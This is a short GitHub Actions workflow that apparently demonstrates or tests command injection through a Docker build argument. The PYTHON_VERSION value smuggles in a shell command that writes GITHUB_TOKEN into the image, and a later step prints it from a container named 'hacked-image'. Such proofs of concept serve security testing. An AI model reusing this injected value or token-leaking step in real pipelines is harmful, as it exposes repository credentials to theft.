jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Build with injected command
        run: |
          docker build . --build-arg PYTHON_VERSION='"; echo $GITHUB_TOKEN > /GITHUB_TOKEN_LEAK; #"'
          docker run --rm hacked-image cat /GITHUB_TOKEN_LEAK || echo "Leak failed"
